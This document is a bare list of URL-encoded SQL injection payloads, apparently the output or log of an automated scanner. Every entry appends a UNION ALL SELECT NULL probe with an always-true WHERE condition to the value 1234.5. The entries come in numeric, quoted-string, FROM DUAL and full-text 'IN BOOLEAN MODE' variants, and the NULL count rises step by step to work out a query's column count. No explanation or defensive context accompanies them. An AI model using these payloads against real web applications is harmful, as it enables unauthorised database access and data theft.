1234.5%20%2B%20%28SELECT%208872%20FROM%20DUAL%20WHERE%207040%3D7040%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%206387%20FROM%20DUAL%20WHERE%204039%3D4039%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207279%20FROM%20DUAL%20WHERE%208965%3D8965%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%202468%20FROM%20DUAL%20WHERE%201325%3D1325%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%209679%20FROM%20DUAL%20WHERE%203392%3D3392%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%205319%20FROM%20DUAL%20WHERE%204792%3D4792%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%201131%20FROM%20DUAL%20WHERE%204392%3D4392%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203069%20FROM%20DUAL%20WHERE%204179%3D4179%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208722%20WHERE%209548%3D9548%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208307%20WHERE%203863%3D3863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%206300%20WHERE%209131%3D9131%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204169%20WHERE%201281%3D1281%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%202067%20WHERE%206919%3D6919%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%202768%20WHERE%202756%3D2756%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%209102%20WHERE%201345%3D1345%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%202662%20WHERE%203629%3D3629%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203507%20WHERE%206530%3D6530%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%201880%20WHERE%203484%3D3484%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%27%20%2B%20%28SELECT%20%27iLNK%27%20FROM%20DUAL%20WHERE%208979%3D8979%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UwlC%27%20FROM%20DUAL%20WHERE%205347%3D5347%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27YqWY%27%20FROM%20DUAL%20WHERE%204277%3D4277%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27BNnt%27%20FROM%20DUAL%20WHERE%201419%3D1419%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27WOaL%27%20FROM%20DUAL%20WHERE%208674%3D8674%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Rglc%27%20FROM%20DUAL%20WHERE%202860%3D2860%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27RIdf%27%20FROM%20DUAL%20WHERE%205686%3D5686%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ydQC%27%20FROM%20DUAL%20WHERE%202848%3D2848%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27sjop%27%20FROM%20DUAL%20WHERE%204315%3D4315%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lANz%27%20FROM%20DUAL%20WHERE%204574%3D4574%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27uoWu%27%20WHERE%205986%3D5986%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27fiqF%27%20WHERE%209905%3D9905%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27EIWt%27%20WHERE%202764%3D2764%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jjbs%27%20WHERE%207306%3D7306%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lTtF%27%20WHERE%207493%3D7493%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Xslt%27%20WHERE%209254%3D9254%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Rerq%27%20WHERE%204243%3D4243%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27HkNn%27%20WHERE%203195%3D3195%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FIka%27%20WHERE%202362%3D2362%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27hWBd%27%20WHERE%201526%3D1526%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 